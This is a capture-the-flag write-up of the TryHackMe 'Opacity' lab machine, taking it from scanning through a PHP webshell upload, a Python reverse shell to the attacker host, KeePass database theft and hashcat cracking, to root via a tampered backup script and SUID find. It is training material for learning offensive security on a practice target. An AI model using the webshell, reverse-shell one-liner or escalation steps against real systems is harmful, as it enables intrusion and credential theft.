🪟Opacity

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Link to room: https://tryhackme.com/r/room/opacity

Machine version: Opacity2

This writeup walks you through a room on TryHackMe created by tryhackme and mindsflee

1 - Scanning

1a - Ports

1ai - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T5 -p- 10.10.148.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 17:56 EEST
Nmap scan report for 10.10.148.146
Host is up (0.12s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 253.34 seconds

1aii - OS Fingerprinting, Service and Version Detection

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80,139,445 10.10.148.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 18:02 EEST
Nmap scan report for 10.10.148.146
Host is up (0.097s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA)
|   256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA)
|_  256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.5 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2024-04-26T15:02:23
|_  start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -12s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.96 seconds

1b - Directory busting

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.148.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.148.146
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.148.146/css/]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/server-status        (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
                                                                                                               
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.148.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.148.146
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/cloud                (Status: 301) [Size: 314] [--> http://10.10.148.146/cloud/]
/css                  (Status: 301) [Size: 312] [--> http://10.10.148.146/css/]
/server-status        (Status: 403) [Size: 278]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

2 - Website - /cloud/

2a - Probing

It seems this web app allows anonymous visitors to upload images to the server, and give out a link to access that image. The image is maybe erased after 5 minutes. Let us try it out.

┌──(kali㉿kali)-[~/Downloads]
└─$ ls | grep *.jpg
f5054e97620f168c7b5088c85ab1d6e4.jpg
                                                                                                               
┌──(kali㉿kali)-[~/Downloads]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

This is perfect for a webshell.

2b - Sending the payload

┌──(kali㉿kali)-[~/Downloads]
└─$ ls *.php       
php_webshell.php
                                                                                                               
┌──(kali㉿kali)-[~/Downloads]
└─$ cat php_webshell.php 
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
                                                                                                               
┌──(kali㉿kali)-[~/Downloads]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

We are going to host the webshell source code on Kali and upload it to the server

┌──(kali㉿kali)-[~/Downloads]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.148.146 - - [26/Apr/2024 21:18:21] "GET /php_webshell.php HTTP/1.1" 200 -

2c - Foothold

For convenience, we will execute this reverse shell payload inside the webshell:

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.14.78.249",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'

┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lvnp 5555           
listening on [any] 5555 ...
connect to [10.14.78.249] from (UNKNOWN) [10.10.148.146] 35982
www-data@opacity:/var/www/html/cloud/images$

We got our reverse shell! We now have a foothold in the target machine

3 - Horizontal privilege escalation

3a - Finding and exfiltrating a Keepass database

┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lvnp 5555           
listening on [any] 5555 ...
connect to [10.14.78.249] from (UNKNOWN) [10.10.148.146] 35982
www-data@opacity:/var/www/html/cloud/images$ cd ..
cd ..
www-data@opacity:/var/www/html/cloud$ ls
ls
folder.png  images  index.php  load.gif  storage.php  style.css
www-data@opacity:/var/www/html/cloud$ cd /opt
cd /opt
www-data@opacity:/opt$ ls
ls
dataset.kdbx
www-data@opacity:/opt$ python -m http.server 80
www-data@opacity:/opt$ python3 -m http.server 8080
python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.14.78.249 - - [26/Apr/2024 18:23:39] "GET / HTTP/1.1" 200 -
10.14.78.249 - - [26/Apr/2024 18:23:39] code 404, message File not found
10.14.78.249 - - [26/Apr/2024 18:23:39] "GET /favicon.ico HTTP/1.1" 404 -
10.14.78.249 - - [26/Apr/2024 18:23:40] "GET /dataset.kdbx HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.148.146:8080/dataset.kdbx
--2024-04-26 21:27:41--  http://10.10.148.146:8080/dataset.kdbx
Connecting to 10.10.148.146:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1566 (1.5K) [application/octet-stream]
Saving to: ‘dataset.kdbx’

dataset.kdbx                100%[==========================================>]   1.53K  --.-KB/s    in 0s      

2024-04-26 21:27:41 (359 MB/s) - ‘dataset.kdbx’ saved [1566/1566]

3b - Cracking the database's password

This guide helped me greatly: https://github.com/patecm/cracking_keepass

┌──(kali㉿kali)-[~/Downloads]
└─$ keepass2john dataset.kdbx
dataset:$keepass$*2*100000*0*2114f635de17709ecc4a2be2c3403135ffd7c0dd09084c4abe1d983ad94d93a5*2bceccca0facfb762eb79ca66588135c72a8835e43d871977ff7d3e9db0ffa17*cae9a25c785fc7f16772bb00bac5cc82*b68e2c3be9e46e8b7fc05eb944fad8b4ec5254a40084a73127b4126408b2ff46*b0afde2bd0db881200fc1c2494baf7c28b7486f081a82e935411ab72a27736b4

C:\Users\Anthony\Desktop\hashcat-6.2.6>hashcat -a 0 -m 13400 dataset.hash rockyou.txt
hashcat (v6.2.6) starting

Successfully initialized the NVIDIA main driver CUDA runtime library.

Failed to initialize NVIDIA RTC library.

* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
             CUDA SDK Toolkit required for proper device support and utilization.
             Falling back to OpenCL runtime.

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.4.131) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce RTX 4080 SUPER, 16256/16375 MB (4093 MB allocatable), 80MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1470 MB

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

$keepass$*2*100000*0*2114f635de17709ecc4a2be2c3403135ffd7c0dd09084c4abe1d983ad94d93a5*2bceccca0facfb762eb79ca66588135c72a8835e43d871977ff7d3e9db0ffa17*cae9a25c785fc7f16772bb00bac5cc82*b68e2c3be9e46e8b7fc05eb944fad8b4ec5254a40084a73127b4126408b2ff46*b0afde2bd0db881200fc1c2494baf7c28b7486f081a82e935411ab72a27736b4:741852963

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*100000*0*2114f635de17709ecc4a2be2c34031...7736b4
Time.Started.....: Fri Apr 26 21:39:41 2024 (2 secs)
Time.Estimated...: Fri Apr 26 21:39:43 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    48964 H/s (8.45ms) @ Accel:4 Loops:512 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 81920/14344385 (0.57%)
Rejected.........: 0/81920 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:99840-100000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> janson
Hardware.Mon.#1..: Temp: 47c Fan:  0% Util:100% Core:2790MHz Mem:11251MHz Bus:16

Started: Fri Apr 26 21:39:38 2024
Stopped: Fri Apr 26 21:39:44 2024

3c - Getting our first flag

┌──(kali㉿kali)-[~/Downloads]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-139-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri 26 Apr 2024 06:50:43 PM UTC

  System load:  0.05              Processes:             129
  Usage of /:   57.1% of 8.87GB   Users logged in:       0
  Memory usage: 28%               IPv4 address for eth0: 10.10.148.146
  Swap usage:   0%


 * Introducing Expanded Security Maintenance for Applications.
   Receive updates to over 25,000 software packages with your
   Ubuntu Pro subscription. Free for personal use.

     https://ubuntu.com/pro

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Wed Feb 22 08:13:43 2023 from 10.0.2.15
sysadmin@opacity:~$ ls
local.txt  scripts

4 - PrivEsc

4a - Setting SUID bit to /usr/bin/find

sysadmin@opacity:~$ ls -la
total 44
drwxr-xr-x 6 sysadmin sysadmin 4096 Feb 22  2023 .
drwxr-xr-x 3 root     root     4096 Jul 26  2022 ..
-rw------- 1 sysadmin sysadmin   22 Feb 22  2023 .bash_history
-rw-r--r-- 1 sysadmin sysadmin  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Feb 25  2020 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Jul 26  2022 .cache
drwx------ 3 sysadmin sysadmin 4096 Jul 28  2022 .gnupg
-rw------- 1 sysadmin sysadmin   33 Jul 26  2022 local.txt
-rw-r--r-- 1 sysadmin sysadmin  807 Feb 25  2020 .profile
drwxr-xr-x 3 root     root     4096 Jul  8  2022 scripts
drwx------ 2 sysadmin sysadmin 4096 Jul 26  2022 .ssh
-rw-r--r-- 1 sysadmin sysadmin    0 Jul 28  2022 .sudo_as_admin_successful
sysadmin@opacity:~$ cd scripts/
sysadmin@opacity:~/scripts$ ls -la
total 16
drwxr-xr-x 3 root     root     4096 Jul  8  2022 .
drwxr-xr-x 6 sysadmin sysadmin 4096 Feb 22  2023 ..
drwxr-xr-x 2 sysadmin root     4096 Jul 26  2022 lib
-rw-r----- 1 root     sysadmin  519 Jul  8  2022 script.php
sysadmin@opacity:~/scripts$ head script.php 
<?php

//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
sysadmin@opacity:~/scripts$ head lib/backup.inc.php 
<?php


ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');


function zipData($source, $destination) {
	if (extension_loaded('zip')) {
		if (file_exists($source)) {
sysadmin@opacity:~/scripts$ cp lib/backup.inc.php ~		
sysadmin@opacity:~/scripts$ which find
/usr/bin/find
sysadmin@opacity:~/scripts$ nano ~/backup.inc.php 
sysadmin@opacity:~/scripts$ head ~/backup.inc.php 
<?php
chmod ("/usr/bin/find", 7777);

ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');


function zipData($source, $destination) {
	if (extension_loaded('zip')) {
		if (file_exists($source)) {
sysadmin@opacity:~/scripts$ mv ~/backup.inc.php lib/backup.inc.php 
mv: replace 'lib/backup.inc.php', overriding mode 0644 (rw-r--r--)? yes
sysadmin@opacity:~/scripts$ ls -la /usr/bin/find
---sr-S--t 1 root root 320160 Feb 18  2020 /usr/bin/find

4b - Voila! Final flag

sysadmin@opacity:~/scripts$ find . -exec /bin/sh -p \; -quit
# whoami
root
# cd /root
# ls
proof.txt  snap

PreviousMustacchio NextPyrat

Last updated 1 year ago

hashtagLicense

hashtag0 - Introduction

hashtag1 - Scanning

hashtag1a - Ports

hashtag1ai - Discovery

hashtag1aii - OS Fingerprinting, Service and Version Detection

hashtag1b - Directory busting

hashtag2 - Website - /cloud/

hashtag2a - Probing

hashtag2b - Sending the payload

hashtag2c - Foothold

hashtag3 - Horizontal privilege escalation

hashtag3a - Finding and exfiltrating a Keepass database

hashtag3b - Cracking the database's password

hashtag3c - Getting our first flag

hashtag4 - PrivEsc

hashtag4a - Setting SUID bit to /usr/bin/find

hashtag4b - Voila! Final flag